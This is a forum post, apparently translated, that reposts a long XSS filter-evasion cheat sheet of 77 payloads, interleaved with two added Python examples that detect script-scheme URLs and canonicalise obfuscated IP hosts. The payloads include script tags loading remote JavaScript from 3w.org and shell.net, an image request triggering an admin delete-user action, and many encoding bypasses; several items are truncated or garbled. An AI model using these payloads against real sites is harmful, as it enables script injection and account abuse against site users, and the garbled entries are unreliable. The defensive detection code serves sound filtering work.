It seems t00ls has relatively little material on XSS; I saw something good and copied it over, in case any classmates need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (use an encoder/calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript (a literal tab between "jav" and "ascript")
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect here in China, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
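The javascript: variants in items 3 to 19 (mixed case, numeric character references with and without semicolons, embedded tab/newline/carriage return, null bytes, leading spaces) all work for one reason: the browser normalises the attribute value before it picks the URL scheme, so a filter that looks at the raw string sees something different from what the browser runs. Below is an added example, not part of the cheat sheet or this post: a Python normaliser that performs the same steps (entity decoding, trimming, dropping tab/LF/CR/NUL, case folding) and reports the scheme, plus a stdlib HTMLParser scan over the URL-bearing attributes the sheet abuses later on (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC). The function names, the URL_ATTRS set and the sample strings are this example's own; event-handler attributes such as onload are deliberately out of its scope.

```python
import html
import re
from html.parser import HTMLParser

# Script schemes that occur in the cheat sheet.
SCRIPT_SCHEMES = {"javascript", "vbscript"}

# URL-valued attributes the cheat sheet abuses. Event handlers such as onload
# are a separate check and are not covered here. (Assumed set for this example.)
URL_ATTRS = {"src", "href", "background", "dynsrc", "lowsrc"}

# Browsers drop ASCII tab, LF, CR and NUL inside a URL before parsing the scheme,
# which is why "jav&#x09;ascript:" and "java\0script:" still run. A literal
# space inside the scheme is NOT dropped, so "jav ascript:" is harmless.
_DROPPED = re.compile(r"[\t\n\r\x00]")
# Leading and trailing C0 controls and spaces are trimmed first (the "spaces
# and meta characters before the JavaScript" case).
_TRIM = "".join(chr(c) for c in range(0x21))


def normalize_url_attr(value: str) -> str:
    """Apply the browser's lenient normalisation to a URL attribute value."""
    # html.unescape accepts numeric references with or without a trailing
    # semicolon, decimal (&#106 / &#0000106) or hex (&#x6A), as browsers do.
    text = html.unescape(value)
    text = text.strip(_TRIM)
    return _DROPPED.sub("", text)


def scheme_of(value: str):
    """Lower-cased URL scheme the browser would see, or None if there is none."""
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", normalize_url_attr(value))
    return m.group(1).lower() if m else None


def is_script_url(value: str) -> bool:
    return scheme_of(value) in SCRIPT_SCHEMES


class ScriptUrlFinder(HTMLParser):
    """Collect (tag, attribute, scheme) for URL attributes with a script scheme."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and is_script_url(value):
                self.hits.append((tag, name, scheme_of(value)))


def find_script_urls(fragment: str):
    """Scan an HTML fragment and return every script-scheme URL attribute found."""
    parser = ScriptUrlFinder()
    parser.feed(fragment)
    parser.close()
    return parser.hits


# Constructed attribute values mirroring the cheat sheet's variants.
SAMPLES = {
    "plain": "javascript:alert('XSS')",
    "mixed_case": "JaVaScRiPt:alert('XSS')",
    "decimal_entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "decimal_no_semicolon": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
                            "&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
    "hex_no_semicolon": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "embedded_tab": "jav&#x09;ascript:alert('XSS');",
    "embedded_newline": "jav&#x0A;ascript:alert('XSS');",
    "embedded_cr": "jav&#x0D;ascript:alert('XSS');",
    "null_byte": "java\x00script:alert(\"XSS\")",
    "leading_space": " &#14;  javascript:alert('XSS');",
    "vbscript": "vbscript:msgbox(\"XSS\")",
    "benign_http": "http://3w.org/XSS/xss.js",
    "benign_space_inside": "jav ascript:alert('XSS')",
}

# Constructed fragment combining several of the tag variants.
FRAGMENT = (
    "<IMG SRC=JaVaScRiPt:alert('XSS')>"
    "<TABLE BACKGROUND=\"javascript:alert('XSS')\">"
    "<IMG SRC=\"http://3w.org/XSS/xss.js\">"
    "<A HREF=\"jav&#x0A;ascript:alert('XSS')\">XSS</A>"
)

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:22s} -> {scheme_of(value)}")
    print(find_script_urls(FRAGMENT))
```

The point of the two "benign" samples is the edge case: a literal space inside the scheme is not stripped by the browser, so flagging it would be a false positive, whereas everything the cheat sheet lists collapses to a plain javascript: or vbscript: scheme after normalisation.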
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character added (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (composed of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Omitting "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
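Items 68 to 76 get past URL filters because a filter that compares the host as a string does not see what the URL parser sees: a dword, hex, octal or mixed-radix address is still 192.168.0.1 (or 66.102.7.147), a name with a trailing dot is the same name, and a scheme-relative "//host/" still resolves. Below is an added example, not part of the cheat sheet or this post: a Python implementation of the browser-style IPv4 host parsing (decimal, hex and octal parts, a short last part filling the remaining bytes, trailing dot) and a same_host comparison on top of urllib.parse.urlsplit, so that an allow-list check canonicalises before it compares. The function names and the URLs in the tests are this example's own.

```python
import re
from urllib.parse import urlsplit

# One dotted part may be hex (0x..), octal (leading 0) or decimal, exactly the
# three spellings the cheat sheet uses.
_HEX = re.compile(r"^0[xX]([0-9a-fA-F]*)$")
_OCT = re.compile(r"^0([0-7]+)$")
_DEC = re.compile(r"^(0|[1-9][0-9]*)$")


def _ipv4_number(part: str):
    """Parse one part of a dotted host; None if it is not numeric at all."""
    m = _HEX.match(part)
    if m:
        return int(m.group(1), 16) if m.group(1) else 0
    m = _OCT.match(part)
    if m:
        return int(m.group(1), 8)
    m = _DEC.match(part)
    if m:
        return int(m.group(1), 10)
    return None


def parse_ipv4_host(host: str):
    """Dotted-quad text for any numeric IPv4 spelling a browser accepts, else None.

    Mirrors the browser rule: up to four parts, each leading part is one byte,
    and the last part supplies all the remaining bytes (so "3232235521" and
    "0x7f.1" are both valid).
    """
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                      # trailing dot, as in "1.2.3.4."
    if not 1 <= len(parts) <= 4:
        return None
    nums = [_ipv4_number(p) for p in parts]
    if any(n is None for n in nums):
        return None
    *head, last = nums
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last
    for i, n in enumerate(head):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(host: str) -> str:
    """Numeric hosts become dotted quads; names are lower-cased, trailing dot removed."""
    ip = parse_ipv4_host(host)
    return ip if ip else host.lower().rstrip(".")


def url_host(url: str):
    """Canonical host of a URL; urlsplit already handles scheme-relative '//host/'."""
    host = urlsplit(url).hostname
    return canonical_host(host) if host else None


def same_host(url_a: str, url_b: str) -> bool:
    """Compare two URLs by canonical host rather than by raw string."""
    a, b = url_host(url_a), url_host(url_b)
    return a is not None and a == b


if __name__ == "__main__":
    # Constructed inputs in the same spellings as items 70 to 76.
    for h in ("3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001",
              "66.000146.0x7.147", "www.google.com."):
        print(f"{h:24s} -> {canonical_host(h)}")
    print(same_host("//www.google.com/", "http://www.google.com./"))
```

The useful behaviour to notice is that "www.google.com" and "google.com" stay different (item 75 is a different host, not an encoding trick), while every numeric spelling of one address and the trailing-dot form of one name compare equal.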